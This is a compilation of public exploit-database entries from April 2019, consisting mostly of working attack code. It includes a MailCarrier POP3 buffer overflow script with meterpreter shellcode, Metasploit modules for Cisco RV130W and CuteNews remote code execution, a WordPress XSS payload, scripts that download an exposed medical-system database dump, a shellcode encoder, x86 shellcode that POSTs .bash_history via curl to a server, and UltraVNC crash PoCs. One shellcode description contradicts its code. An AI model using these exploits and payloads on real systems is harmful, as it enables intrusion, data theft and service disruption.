#!/usr/bin/python
# Exploit Title: MailCarrier 2.51 - SEH Remote Buffer Overflow in "TOP" command(POP3)
# Date: 14/04/2019
# Exploit Author: Dino Covotsos - Telspace Systems
# Vendor Homepage: https://www.tabslab.com/
# Version: 2.51
# Software Link: N.A
# Contact: services[@]telspace.co.za
# Twitter: @telspacesystems (Greets to the Telspace Crew)
# Tested on: Windows XP Prof SP3 ENG x86
# CVE: TBC from Mitre
# Created for the Telspace Internship 2019 - SEH Exploit
# POC
# 1.) Change ip, username, password and port in code
# 2.) Run script against target, meterpreter bind shell waiting for you on port 443 on the target machine
#0x1b0d110c : pop ecx # pop ecx # ret 0x08 | ascii {PAGE_EXECUTE_READ} [msjet40.dll] ASLR: False, Rebase: False, SafeSEH: False, OS: True, v4.00.9514.0 (C:\WINDOWS\system32\msjet40.dll)
#crash at 6175
import sys
import socket
import time

#msfvenom -a x86 --platform windows -p windows/meterpreter/bind_tcp LPORT=443 -e x86/alpha_mixed -b "\x00\xd5\x0a\x0d\x1a\x03" -f c
shellcode = ("\x89\xe1\xdb\xcb\xd9\x71\xf4\x58\x50\x59\x49\x49\x49\x49\x49"
"\x49\x49\x49\x49\x49\x43\x43\x43\x43\x43\x43\x37\x51\x5a\x6a"
"\x41\x58\x50\x30\x41\x30\x41\x6b\x41\x41\x51\x32\x41\x42\x32"
"\x42\x42\x30\x42\x42\x41\x42\x58\x50\x38\x41\x42\x75\x4a\x49"
"\x69\x6c\x78\x68\x6f\x72\x47\x70\x37\x70\x53\x30\x31\x70\x4f"
"\x79\x58\x65\x66\x51\x49\x50\x50\x64\x4c\x4b\x50\x50\x56\x50"
"\x4e\x6b\x56\x32\x74\x4c\x6e\x6b\x50\x52\x36\x74\x6c\x4b\x63"
"\x42\x36\x48\x66\x6f\x58\x37\x52\x6a\x35\x76\x76\x51\x69\x6f"
"\x6c\x6c\x35\x6c\x51\x71\x33\x4c\x75\x52\x64\x6c\x47\x50\x69"
"\x51\x4a\x6f\x34\x4d\x37\x71\x38\x47\x58\x62\x6c\x32\x62\x72"
"\x70\x57\x6c\x4b\x52\x72\x42\x30\x4e\x6b\x53\x7a\x65\x6c\x6e"
"\x6b\x30\x4c\x42\x31\x33\x48\x78\x63\x31\x58\x55\x51\x4b\x61"
"\x66\x31\x6c\x4b\x50\x59\x37\x50\x67\x71\x38\x53\x6e\x6b\x33"
"\x79\x65\x48\x6a\x43\x75\x6a\x62\x69\x6c\x4b\x56\x54\x6e\x6b"
"\x37\x71\x38\x56\x55\x61\x39\x6f\x4c\x6c\x4a\x61\x78\x4f\x46"
"\x6d\x37\x71\x49\x57\x66\x58\x69\x70\x31\x65\x6b\x46\x55\x53"
"\x51\x6d\x69\x68\x65\x6b\x61\x6d\x51\x34\x74\x35\x6a\x44\x70"
"\x58\x6c\x4b\x30\x58\x55\x74\x65\x51\x6b\x63\x61\x76\x6e\x6b"
"\x76\x6c\x30\x4b\x6e\x6b\x71\x48\x47\x6c\x33\x31\x7a\x73\x4c"
"\x4b\x55\x54\x6c\x4b\x77\x71\x6e\x30\x4b\x39\x32\x64\x34\x64"
"\x36\x44\x61\x4b\x51\x4b\x45\x31\x30\x59\x52\x7a\x42\x71\x59"
"\x6f\x69\x70\x53\x6f\x33\x6f\x72\x7a\x4c\x4b\x34\x52\x78\x6b"
"\x6c\x4d\x63\x6d\x71\x78\x50\x33\x77\x42\x55\x50\x53\x30\x33"
"\x58\x70\x77\x70\x73\x30\x32\x31\x4f\x61\x44\x42\x48\x30\x4c"
"\x54\x37\x76\x46\x34\x47\x59\x6f\x78\x55\x78\x38\x4c\x50\x33"
"\x31\x65\x50\x35\x50\x35\x79\x48\x44\x50\x54\x30\x50\x75\x38"
"\x56\x49\x6f\x70\x62\x4b\x75\x50\x69\x6f\x68\x55\x73\x5a\x74"
"\x4b\x42\x79\x62\x70\x79\x72\x59\x6d\x53\x5a\x63\x31\x52\x4a"
"\x67\x72\x65\x38\x6b\x5a\x74\x4f\x79\x4f\x69\x70\x69\x6f\x48"
"\x55\x5a\x37\x31\x78\x44\x42\x73\x30\x33\x31\x4d\x6b\x6e\x69"
"\x38\x66\x70\x6a\x76\x70\x70\x56\x72\x77\x53\x58\x6f\x32\x59"
"\x4b\x46\x57\x73\x57\x39\x6f\x38\x55\x6d\x55\x39\x50\x43\x45"
"\x61\x48\x53\x67\x65\x38\x4e\x57\x59\x79\x66\x58\x4b\x4f\x6b"
"\x4f\x59\x45\x43\x67\x75\x38\x51\x64\x58\x6c\x77\x4b\x39\x71"
"\x69\x6f\x49\x45\x32\x77\x4d\x47\x42\x48\x43\x45\x32\x4e\x52"
"\x6d\x50\x61\x4b\x4f\x39\x45\x52\x4a\x67\x70\x53\x5a\x74\x44"
"\x73\x66\x42\x77\x53\x58\x43\x32\x7a\x79\x39\x58\x63\x6f\x79"
"\x6f\x6e\x35\x4d\x53\x4c\x38\x65\x50\x73\x4e\x46\x4d\x4e\x6b"
"\x66\x56\x30\x6a\x57\x30\x65\x38\x33\x30\x62\x30\x77\x70\x75"
"\x50\x63\x66\x70\x6a\x65\x50\x52\x48\x61\x48\x39\x34\x61\x43"
"\x69\x75\x69\x6f\x38\x55\x7a\x33\x50\x53\x31\x7a\x45\x50\x66"
"\x36\x51\x43\x76\x37\x31\x78\x43\x32\x69\x49\x6f\x38\x51\x4f"
"\x4b\x4f\x39\x45\x4d\x53\x69\x68\x43\x30\x63\x4e\x73\x37\x67"
"\x71\x4a\x63\x44\x69\x5a\x66\x73\x45\x38\x69\x6a\x63\x6f\x4b"
"\x4a\x50\x4c\x75\x4e\x42\x42\x76\x33\x5a\x37\x70\x63\x63\x69"
"\x6f\x78\x55\x41\x41")

buffer = "A" * 6175 + "\xeb\x11\x90\x90" + "\x0c\x11\x0d\x1b" + "\x90" * 20 + shellcode + "D" * (10000-6883)

print "[*] Mail Server 2.51 POP3 Buffer Overflow in TOP command\r\n"
print "[*] Sending pwnage buffer: with %s bytes..." %len(buffer)
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
connect=s.connect(("192.168.0.150", 110))
print s.recv(1024)
print "[*] Sending USERNAME\r\n"
s.send('USER test' + '\r\n')
print s.recv(1024)
print "[*] Sending PASSWORD\r\n"
s.send('PASS test' + '\r\n')
print s.recv(1024)
print "[*] Sending TOP command plus evil buffer\r\n"
s.send('TOP ' + buffer + '\r\n')
s.send('QUIT\r\n')
s.close()
time.sleep(1)
print "[*] Done, check for meterpreter shell on port 443 of the target!"

##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##

# linux/armle/meterpreter/bind_tcp -> segfault
# linux/armle/meterpreter/reverse_tcp -> segfault
# linux/armle/meterpreter_reverse_http -> works
# linux/armle/meterpreter_reverse_https -> works
# linux/armle/meterpreter_reverse_tcp -> works
# linux/armle/shell/bind_tcp -> segfault
# linux/armle/shell/reverse_tcp -> segfault
# linux/armle/shell_bind_tcp -> segfault
# linux/armle/shell_reverse_tcp -> segfault
#
class MetasploitModule < Msf::Exploit::Remote
  Rank = GoodRanking

  include Msf::Exploit::Remote::HttpClient
  include Msf::Exploit::CmdStager

  def initialize(info = {})
    super(update_info(info,
'Name'           => 'Cisco RV130W Routers Management Interface Remote Command Execution',
'Description'    => %q{
        A vulnerability in the web-based management interface of the Cisco RV130W Wireless-N Multifunction VPN Router
         could allow an unauthenticated, remote attacker to execute arbitrary code on an affected device.

         The vulnerability is due to improper validation of user-supplied data in the web-based management interface.
         An attacker could exploit this vulnerability by sending malicious HTTP requests to a targeted device.

         A successful exploit could allow the attacker to execute arbitrary code on the underlying operating
          system of the affected device as a high-privilege user.

        RV130W Wireless-N Multifunction VPN Router versions prior to 1.0.3.45 are affected.

        Note: successful exploitation may not result in a session, and as such,
         on_new_session will never repair the HTTP server, leading to a denial-of-service condition.
      },
'Author'         =>
        [
'Yu Zhang', # Initial discovery
'Haoliang Lu', # Initial discovery
'T. Shiomitsu', # Initial discovery
'Quentin Kaiser <kaiserquentin@gmail.com>' # Vulnerability analysis & exploit dev
        ],
'License'         => MSF_LICENSE,
'Platform'        =>  %w[linux],
'Arch'            =>  [ARCH_ARMLE],
'SessionTypes'    =>  %w[meterpreter],
'CmdStagerFlavor' => %w{ wget },
'Privileged'      => true, # BusyBox
'References'      =>
        [
          ['CVE', '2019-1663'],
          ['BID', '107185'],
          ['URL', 'https://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-20190227-rmi-cmd-ex'],
        ],
'DefaultOptions' => {
'WfsDelay' => 10,
'SSL' => true,
'RPORT' => 443,
'CMDSTAGER::FLAVOR' => 'wget',
'PAYLOAD' => 'linux/armle/meterpreter_reverse_tcp',
       },
'Targets'        =>
        [
          [ 'Cisco RV130/RV130W < 1.0.3.45',
            {
'offset'          => 446,
'libc_base_addr'  => 0x357fb000,
'system_offset'   => 0x0004d144,
'gadget1'         => 0x00020e79, # pop {r2, r6, pc};
'gadget2'         => 0x00041308, # mov r0, sp; blx r2;
'Arch'            => ARCH_ARMLE,
            }
          ],
        ],
'DisclosureDate'  => 'Feb 27 2019',
'DefaultTarget'   => 0,
'Notes' => {
'Stability'   => [ CRASH_SERVICE_DOWN, ],
      },
    ))
  end

  def p(offset)
    [(target['libc_base_addr'] + offset).to_s(16)].pack('H*').reverse
  end

  def prepare_shellcode(cmd)
    #All these gadgets are from /lib/libc.so.0
    shellcode = rand_text_alpha(target['offset']) +       # filler
      p(target['gadget1']) +
      p(target['system_offset']) +                        # r2
      rand_text_alpha(4) +                                # r6
      p(target['gadget2']) +                              # pc
      cmd
    shellcode
  end

  def send_request(buffer)
    begin
      send_request_cgi({
'uri'     => '/login.cgi',
'method'  => 'POST',
'vars_post' => {
"submit_button": "login",
"submit_type": "",
"gui_action": "",
"wait_time": 0,
"change_action": "",
"enc": 1,
"user": rand_text_alpha_lower(5),
"pwd": buffer,
"sel_lang": "EN"
          }
      })
    rescue ::Rex::ConnectionError
      fail_with(Failure::Unreachable, "#{peer} - Failed to connect to the router")
    end
  end

  def exploit
    print_status('Sending request')
    execute_cmdstager
  end

  def execute_command(cmd, opts = {})
    shellcode = prepare_shellcode(cmd.to_s)
    send_request(shellcode)
  end

  def on_new_session(session)
    # Given there is no process continuation here, the httpd server will stop
    # functioning properly and we need to take care of proper restart
    # ourselves.
    print_status("Reloading httpd service")
    reload_httpd_service = "killall httpd && cd /www && httpd && httpd -S"
    if session.type.to_s.eql? 'meterpreter'
      session.core.use 'stdapi' unless session.ext.aliases.include? 'stdapi'
      session.sys.process.execute '/bin/sh', "-c \"#{reload_httpd_service}\""
    else
      session.shell_command(reload_httpd_service)
    end
  ensure
    super
  end
end

* Exploit Title: WordPress Download Manager Cross-site Scripting
* Discovery Date: 2019-04-13
* Exploit Author: ThuraMoeMyint
* Author Link: https://twitter.com/mgthuramoemyint
* Vendor Homepage: https://www.wpdownloadmanager.com
* Software Link: https://wordpress.org/plugins/download-manager
* Version: 4.9.1
* Category: WebApps, WordPress

Description
--

In the pro features of the WordPress download manager plugin, there is a Category Short-code feature witch can use to sort categories with order by a function which will be used as ?orderby=title,publish_date .
By adding parameter "> and add any XSS payload , the xss payload will execute.

To reproduce,

1.Go to the link where we can find ?orderby
2.Add parameters >” and give simple payload like <script>alert(1)</script>
3.The payload will execute.
--

PoC
--

<div class="btn-group btn-group-sm pull-right"><button type="button" class="btn btn-primary" disabled="disabled">Order &nbsp;</button><a class="btn btn-primary" href="https://demo.wpdownloadmanager.com/wpdmpro/category-short-code/?orderby=publish_date\"><script>alert(11)</script>&order=asc">Asc</a><a class="btn btn-primary" href="https://demo.wpdownloadmanager.com/wpdmpro/category-short-code/?orderby=publish_date\"><script>alert(11)</script>&order=desc">Desc</a></div>                         

--

Demo -:https://demo.wpdownloadmanager.com/wpdmpro/category-short-code/?orderby=publish_date%22%3E%3Cscript%3Ealert(11)%3C/script%3E&order=desc

###########################################################################

# Exploit Title : NIT-Warangal Dispensary Management System India 1.0 Database Disclosure
# Author [ Discovered By ] : KingSkrupellos
# Team : Cyberizm Digital Security Army
# Date : 15/04/2019
# Vendor Homepage : nitw.ac.in
# Software Download Link : github.com/NIT-Warangal/DispensaryMS/archive/master.zip
# Sofware Information : nitw.ac.in/main/facilities/medical/
en.wikipedia.org/wiki/National_Institute_of_Technology,_Warangal
# Software Version : 1.0
# Tested On : Windows and Linux
# Category : WebApps
# Exploit Risk : Medium
# Vulnerability Type : 
CWE-200 [ Information Exposure ]
CWE-538 [ File and Directory Information Exposure ]
# PacketStormSecurity : packetstormsecurity.com/files/authors/13968
# CXSecurity : cxsecurity.com/author/KingSkrupellos/1/
# Exploit4Arab : exploit4arab.org/author/351/KingSkrupellos
# Acunetix Reference Link About => [ phpMyAdmin SQL Dump File ]
acunetix.com/vulnerabilities/web/phpmyadmin-sql-dump/
# Acunetix Reference Link About : [ Possible Database Backup File ]
acunetix.com/vulnerabilities/web/possible-database-backup/

###########################################################################

# Information about Software :
****************************
This project is an effort to reduce the amount of paperwork thats used in the dispensary system 

at NIT-Warangal. It aims to computerize the process of a student/professor getting their medication 

and at the same time serve as a validation system to pharmacy medication and inventory system.

###########################################################################

# Impact :
***********
* The product stores sensitive information in files or directories that are accessible 

to actors outside of the intended control sphere.

* An information exposure is the intentional or unintentional disclosure of information 

to an actor that is not explicitly authorized to have access to that information.

* phpMyAdmin is a free software tool written in PHP, intended to handle the administration of 

MySQL over the World Wide Web. It can be used to dump a database or a collection of 

databases for backup or transfer to another SQL server (not necessarily a MySQL server). 

The dump typically contains SQL statements to create the table, populate it, or both. 

This file contains an phpMyAdmin SQL dump. This information is highly sensitive and 

should not be found on a production system.

* It looks like this file contains a database backup/dump. 

Acunetix inferred this filename from the domain name. A database backup contains a record of the

 table structure and/or the data from a database and is usually in the form of a list of SQL statements. 

A database backup is most often used for backing up a database so that its contents can be restored 

in the event of data loss. This information is highly sensitive and should never be found on a production system.

Remediation : Sensitive files such as database backups should never be stored in a directory that is accessible 

to the web server. As a workaround, you could restrict access to this file.

Development Set Up => 
**********************
Mac OS X and Linux => 
***********************
1. Go to the required folder , eg. ~/Documents
2. git clone https://github.com/NIT-Warangal/DispensaryMS
3. cd DispensaryMS
4. virtualenv venv
5. source venv/bin/activate
6. pip install -r requirements.txt
7. open the config.py file and set the required files.
8. Open mysql and set up the database and sync the .sql file
9. Open a new terminal tab and enter into venv as in step 5
10. sudo python -m smtpd -n -c DebuggingServer localhost:25
11. Switch back to the previous tab while keeping this running.
12. python Dispensary.py

Windows Setup => 
********************
1. Open cmd in administrator mode.
2. Type "pip install flask".
3. Type "pip install -r requirements.txt".
4. Type "pip install flask-mysql" (if its fails do step 5 )
5. Download connecter from http://www.codegood.com/
6. Go to project folder and type "python server.py"

(It may show some errors for some dependencies)
1. Type "pip install -r requirements.txt".
2. Type "python server.py"
(Assumed the SQL using is XAMPP's MYSQL)

Server Deployment =>
*********************
For best use a Ubuntu server or a CentOS server
1. Follow the same development setup
2. open screen mode in terminal
3. run python Dispensary.py

install.sh
*********
git clone https://www.github.com/NIT-Warangal/DispensaryMS
cd DispensaryMS
source venv/bin/activate
sudo pip install -r requirements.txt
python server.py 

###########################################################################

File :
******
/Dispensary.sql

Information :
*************
-- phpMyAdmin SQL Dump
-- version 4.1.12
-- phpmyadmin.net
--
-- Host: 127.0.0.1
-- Server version: 5.5.37-0ubuntu0.14.04.1
-- PHP Version: 5.5.11
-- Database: `Dispensary`

-- Table structure for table `Employee`

-- Dumping data for table `Employee`

-- Table structure for table `Login`

-- Table structure for table `Bills` to keep track of uploads

-- Table structure for table `Pharmacy`

-- Table structure for table `Prescription`

-- Table structure for table `PrescriptionIndex`

-- Table structure for table `Student`

-- Table structure for table `Users`

-- Table structure for table `Letters` to keep track of uploads

-- Table structure for table `ResetPassword` to keep track of uploads

-- Table structure for table `CheckPassword` to keep track of uploads

-- Table structure for table `ChatSessionHistory`

-- Table structure for table `ChatTransactions`

-- Dump Completed.

raw.githubusercontent.com/NIT-Warangal/DispensaryMS/master/Dispensary.sql

Information about File :
********************
/config.py

Information :
************
# Database Config

config = {
'MYSQL_DATABASE_USER' : '', #Username for mysql
'MYSQL_DATABASE_DB' : 'Dispensary',
'MYSQL_DATABASE_PASSWORD' : '', # Password to connect to mysql
'MYSQL_DATABASE_HOST' : 'localhost', 
'USERNAME' : '',
'USERID' :'',
}

# To run the mail server run
# sudo python -m smtpd -n -c DebuggingServer localhost:25
# mail server settings

MAIL_SERVER = 'localhost'
MAIL_PORT = 25
MAIL_USERNAME = None
MAIL_PASSWORD = None

# Administrator list
ADMINS = ['you@example.com']

raw.githubusercontent.com/NIT-Warangal/DispensaryMS/master/config.py

###########################################################################

# Database Disclosure Information Exposure Exploit 1 :
***********************************************
#!/usr/bin/python
import string
import re
from urllib2 import Request, urlopen
disc = "/Dispensary.sql"
url = raw_input ("URL: ")
req = Request(url+disc)
rta = urlopen(req)
print "Result"
html = rta.read()
rdo = str(re.findall("resources.*=*", html))
print rdo
exit

###########################################################################

# Database Disclosure Information Exposure Exploit 2 :
***********************************************
#!/usr/bin/perl -w
# Author : KingSkrupellos
# Team : Cyberizm Digital Security Army

use LWP::Simple;
use LWP::UserAgent;

system('cls');
system('NIT-Warangal Dispensary Management System 1.0 Database Disclosure Exploit');
system('color a');


if(@ARGV < 2)
{
print "[-]How To Use\n\n";
&help; exit();
}
sub help()
{
print "[+] usage1 : perl $0 site.com /path/ \n";
print "[+] usage2 : perl $0 localhost / \n";
}
($TargetIP, $path, $File,) = @ARGV;

$File="Dispensary.sql";
my $url = "http://" . $TargetIP . $path . $File;
print "\n Wait Please Dear Hacker!!! \n\n";

my $useragent = LWP::UserAgent->new();
my $request = $useragent->get($url,":content_file" => "D:/Dispensary.sql");

if ($request->is_success)
{
print "[+] $url Exploited!\n\n";
print "[+] Database saved to D:/Dispensary.sql\n";
exit();
}
else
{
print "[!] Exploiting $url Failed !\n[!] ".$request->status_line."\n";
exit();
}

###########################################################################

# Discovered By KingSkrupellos from Cyberizm.Org Digital Security Team 

###########################################################################

################################################################################
INTRO
################################################################################

# Exploit Title: MMX-PUNPCKLBW Encoder
# Description: Payload encoder using MMX PUNPCKLBW instruction
# Date: 13/04/2019
# Exploit Author: Petr Javorik
# Tested on: Linux ubuntu 3.13.0-32-generic x86
# Shellcode length: 61

################################################################################
ENCODER
################################################################################

#!/usr/bin/env python

# stack execve
SHELLCODE = bytearray(
    b'\x31\xc0\x50\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x50\x89\xe2\x53\x89\xe1\xb0\x0b\xcd\x80'
)

# Align to qword multiples
missing_bytes = 8 - (len(SHELLCODE) % 8)
padding = [0x90 for _ in range(missing_bytes)]
SHELLCODE.extend(padding)

# Shuffle payload
shuffled_payload = []
# First byte carries count of needed PUNPCKLBW loops
loop_count = len(SHELLCODE)//8
shuffled_payload.append(loop_count)
for block_num in range(0, loop_count):
    current_block = SHELLCODE[(8 * block_num) : (8 * block_num + 8)]
    shuffled_block = [current_block[i] for i in [0, 2, 4, 6, 1, 3, 5, 7]]
    shuffled_payload.extend(shuffled_block)

# Remove trailing NOPS
for byte in shuffled_payload[::-1]:
    if byte == 0x90:
        del shuffled_payload[-1]
    else:
        break

# Print shellcode
print('Payload length: {}'.format(len(shuffled_payload)))
print('\\x' + '\\x'.join('{:02x}'.format(byte) for byte in shuffled_payload))
print('0x' + ',0x'.join('{:02x}'.format(byte) for byte in shuffled_payload))

################################################################################
DECODER
################################################################################

global _start

section .text
_start:

    jmp short call_decoder

decoder:

    pop edi
    xor ecx, ecx
    mov cl, [edi]
    inc edi
    mov esi, edi

decode:

    movq mm0, qword [edi]
    movq mm1, qword [edi +4]
    punpcklbw mm0, mm1
    movq qword [edi], mm0
    add edi, 0x8
    loop decode
    jmp esi

call_decoder:

    call decoder
    EncodedShellcode: db 0x04,0x31,0x50,0x2f,0x73,0xc0,0x68,0x2f,0x68,0x68,0x62,0x6e,0xe3,0x2f,0x69,0x89,0x50,0x89,0x53,0xe1,0x0b,0xe2,0x89,0xb0,0xcd,0x80

################################################################################
TESTING
################################################################################

#include<stdio.h>
#include<string.h>

unsigned char code[] = \
"\xeb\x1c\x5f\x31\xc9\x8a\x0f\x47\x89\xfe\x0f\x6f\x07\x0f\x6f\x4f\x04\x0f\x60\xc1\x0f\x7f\x07\x83\xc7\x08\xe2\xee\xff\xe6\xe8\xdf\xff\xff\xff\x04\x31\x50\x2f\x73\xc0\x68\x2f\x68\x68\x62\x6e\xe3\x2f\x69\x89\x50\x89\x53\xe1\x0b\xe2\x89\xb0\xcd\x80";

main()
{
    printf("Shellcode Length:  %d\n", strlen(code));
    int (*CodeFun)() = (int(*)())code;
    CodeFun();
}

################################################################################


Kind Regards
------------------------------

Bc. Petr Javorik
www.mmquant.net
<http://www.mmquant.net/>maple@mmquant.net

##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##

class MetasploitModule < Msf::Exploit::Remote
  Rank = ExcellentRanking

  include Msf::Exploit::Remote::HttpClient

  def initialize(info = {})
    super(update_info(info,
'Name' => "CuteNews 2.1.2 - 'avatar' Remote Code Execution",
'Description' => %q(
        This module exploits a command execution vulnerability in CuteNews prior to 2.1.2.
        The attacker can infiltrate the server through the avatar upload process in the profile area.
        There is no realistic control of the $imgsize function in "/core/modules/dashboard.php"
        Header content of the file can be changed and the control can be bypassed.
        We can use the "GIF" header for this process.
        An ordinary user is enough to exploit the vulnerability. No need for admin user.
        The module creates a file for you and allows RCE.
      ),
'License' => MSF_LICENSE,
'Author' =>
        [
'AkkuS <Özkan Mustafa Akkuş>', # Discovery & PoC & Metasploit module
        ],
'References' =>
        [
          ['URL', 'http://pentest.com.tr/exploits/CuteNews-2-1-2-Remote-Code-Execution-Metasploit.html']
          ['URL', 'http://cutephp.com'] # Official Website
        ],
'Platform' => 'php',
'Arch' => ARCH_PHP,
'Targets' => [['Automatic', {}]],
'Privileged' => false,
'DisclosureDate' => "Apr 14 2019",
'DefaultTarget' => 0))

    register_options(
      [
        OptString.new('TARGETURI', [true, "Base CutePHP directory path", '/CuteNews']),
        OptString.new('USERNAME', [true, "Username to authenticate with", 'admin']),
        OptString.new('PASSWORD', [false, "Password to authenticate with", 'admin'])
      ]
    )
  end

  def exec
    res = send_request_cgi({
'method'   => 'GET',
'uri'      => normalize_uri(target_uri.path, "uploads","avatar_#{datastore['USERNAME']}_#{@shell}") # shell url
    })
  end
##
# Login and cookie information gathering
##

  def login(uname, pass, check)
    # 1st request to get cookie
    res = send_request_cgi(
'method' => 'POST',
'uri' => normalize_uri(target_uri.path, 'index.php'),
'vars_post' => {
'action' => 'dologin',
'username' => uname,
'password' => pass
      }
    )

    cookie = res.get_cookies
    # 2nd request to cookie validation
    res = send_request_cgi({
'method'   => 'GET',
'uri'      => normalize_uri(target_uri.path, "index.php"),
'cookie'   => cookie
    })

    if res.code = 200 && (res.body =~ /dashboard/)
      return cookie     
    end 

    fail_with(Failure::NoAccess, "Authentication was unsuccessful with user: #{uname}")
    return nil
  end

  def peer
"#{ssl ? 'https://' : 'http://' }#{rhost}:#{rport}"
  end
##
# Upload malicious file // payload integration
##
  def upload_shell(cookie, check)

    res = send_request_cgi({
'method'   => 'GET',
'uri'      => normalize_uri(target_uri.path, "index.php?mod=main&opt=personal"),
'cookie'   => cookie
    })

    signkey = res.body.split('__signature_key" value="')[1].split('"')[0]
    signdsi = res.body.split('__signature_dsi" value="')[1].split('"')[0]
    # data preparation
    fname = Rex::Text.rand_text_alpha_lower(8) + ".php"
    @shell = "#{fname}"
    pdata = Rex::MIME::Message.new
    pdata.add_part('main', nil, nil, 'form-data; name="mod"')
    pdata.add_part('personal', nil, nil, 'form-data; name="opt"')
    pdata.add_part("#{signkey}", nil, nil, 'form-data; name="__signature_key"')
    pdata.add_part("#{signdsi}", nil, nil, 'form-data; name="__signature_dsi"')
    pdata.add_part('', nil, nil, 'form-data; name="editpassword"')
    pdata.add_part('', nil, nil, 'form-data; name="confirmpassword"')
    pdata.add_part("#{datastore['USERNAME']}", nil, nil, 'form-data; name="editnickname"')
    pdata.add_part("GIF\r\n" + payload.encoded, 'image/png', nil, "form-data; name=\"avatar_file\"; filename=\"#{fname}\"")
    pdata.add_part('', nil, nil, 'form-data; name="more[site]"')
    pdata.add_part('', nil, nil, 'form-data; name="more[about]"')
    data = pdata.to_s

    res = send_request_cgi({
'method' => 'POST',    
'data'  => data,
'agent' => 'Mozilla',
'ctype' => "multipart/form-data; boundary=#{pdata.bound}",
'cookie' => cookie,
'uri' => normalize_uri(target_uri.path, "index.php")     
    })

    if res && res.code == 200 && res.body =~ /User info updated!/
      print_status("Trying to upload #{fname}")
      return true
    else
      fail_with(Failure::NoAccess, 'Error occurred during uploading!')
      return false
    end

  end
##
# Exploit controls and information
##
  def exploit
    unless Exploit::CheckCode::Vulnerable == check
      fail_with(Failure::NotVulnerable, 'Target is not vulnerable.')
    end

    cookie = login(datastore['USERNAME'], datastore['PASSWORD'], false)
    print_good("Authentication was successful with user: #{datastore['USERNAME']}")

    if upload_shell(cookie, true)
      print_good("Upload successfully.")
      exec
    end
  end
##
# Version and Vulnerability Check
##
  def check

    res = send_request_cgi({
'method'   => 'GET',
'uri'      => normalize_uri(target_uri.path, "index.php")
    })

    unless res
      vprint_error 'Connection failed'
      return CheckCode::Unknown
    end

    if res.code == 200
      version = res.body.split('target="_blank">CuteNews ')[1].split('</a>')[0]
      if version < '2.1.3'
       print_status("#{peer} - CuteNews is #{version}")
       return Exploit::CheckCode::Vulnerable
      end
    end

    return Exploit::CheckCode::Safe
  end
end
##
# The end of the adventure (o_O) // AkkuS
##

 Exploit Title: Linux/x86 cat file encode to base64 and post via curl to webserver  (125 bytes)
# Google Dork: None
# Date: 11.04.2019
# Exploit Author: strider
# Vendor Homepage: None
# Software Link: None
# Tested on: Debian 9 Stretch i386/ Kali Linux i386
# CVE : None
# Shellcode Length: 125
------------------------------[Description]---------------------------------

This shellcode writes a new user to the given passwd file

Username = sshd
password = root
Shell = sh

-----------------------------[Shellcode Dump]---------------------------------
section .text

global _start

_start:
  xor eax, eax
  push eax
  jmp short _cmd

_build:
  pop ecx
  mov edi, ecx
  xor ecx, ecx
  push eax
  push 0x68732f6e
  push 0x69622f2f

_param:
  mov ebx, esp
  push eax
  push word 0x632d
  mov esi, esp

_exec:
  push eax
  push edi
  push esi
  push ebx

  mov ecx, esp
  mov al, 11
  int 0x80

_cmd:
  call _build
  msg db "curl http://localhost:8080 -d 'data='$(cat .bash_history | base64 -w 0) -X POST", 0x0a
  ; decoded url = curl http://localhost:8080 -d 'data='$(cat .bash_history | base64 -w 0) -X POST
  ;change url to your server
  ; change file to you target file like /etc/passwd


 -----------------------------[Compile]---------------------------------------------
 gcc -m32 -fno-stack-protector -z execstack -o tester tester.c

 -----------------------------[C-Code]-----------------------------

 #include <stdio.h>
 #include <string.h>

 unsigned char shellcode[] = "\x31\xc0\x50\xeb\x23\x59\x89\xcf\x31\xc9\x50\x68\x6e\x2f\x73\x68\x68\x2f\x2f\x62\x69\x89\xe3\x50\x66\x68\x2d\x63\x89\xe6\x50\x57\x56\x53\x89\xe1\xb0\x0b\xcd\x80\xe8\xd8\xff\xff\xff\x63\x75\x72\x6c\x20\x68\x74\x74\x70\x3a\x2f\x2f\x6c\x6f\x63\x61\x6c\x68\x6f\x73\x74\x3a\x38\x30\x38\x30\x20\x2d\x64\x20\x27\x64\x61\x74\x61\x3d\x27\x24\x28\x63\x61\x74\x20\x2e\x62\x61\x73\x68\x5f\x68\x69\x73\x74\x6f\x72\x79\x20\x7c\x20\x62\x61\x73\x65\x36\x34\x20\x2d\x77\x20\x30\x29\x20\x2d\x58\x20\x50\x4f\x53\x54\x0a";

 void main()
 {
     printf("Shellcode Length:  %d\n", strlen(shellcode));

     int (*ret)() = (int(*)())shellcode;
     ret();
 }

#Exploit Title: UltraVNC Viewer 1.2.2.4 - Denial of Service (PoC)
#Discovery by: Victor Mondragón
#Discovery Date: 2019-04-14
#Vendor Homepage: https://www.uvnc.com/
#Software Link: https://www.uvnc.com/downloads/ultravnc/126-download-ultravnc-1224.html
#Tested Version: 1.2.2.4
#Tested on: Windows 7 x64 Service Pack 1

#Steps to produce the crash:
#1.- Run python code: UltraVNC_Viewer_1.2.2.4.py
#2.- Open UltraViewer.txt and copy content to clipboard
#3.- Open UltraVNC Viewer 
#4.- In "VNC Server" Paste Clipboard
#5.- Click on "Connect"
#6.- Crashed

cod = "\x41" * 256

f = open('UltraViewer.txt', 'w')
f.write(cod)
f.close()

#Exploit Title: UltraVNC Launcher 1.2.2.4 - Denial of Service (PoC)
#Discovery by: Victor Mondragón
#Discovery Date: 2019-04-14
#Vendor Homepage: https://www.uvnc.com/
#Software Link: https://www.uvnc.com/downloads/ultravnc/126-download-ultravnc-1224.html
#Tested Version: 1.2.2.4
#Tested on: Windows 7 x64 Service Pack 1

#Steps to produce the crash:
#1.- Run python code: UltraVNC_Launcher_1.2.2.4.py
#2.- Open UltraLauncher.txt and copy content to clipboard
#3.- Open UltraVNC Launcher
#4.- Select "Properties"
#5.- In "Path vncviewer.exe" Paste Clipboard
#6.- Click on "OK"
#7.- Crashed

cod = "\x41" * 300

f = open('UltraLauncher.txt', 'w')
f.write(cod)
f.close()

# Exploit Title: Seo Panel Plugin Newsletter 1.2.0 - 'plugins/newsletter/unsubscribemaillist.php email' Cross-site Scripting
# Google Dork: N/A
# Date: 15 April 2019
# Exploit Author: Deyaa Muhammad
# Author EMail: contact [at] deyaa.me
# Author Blog: http://deyaa.me
# Vendor Homepage: http://sp.seopanel.in/
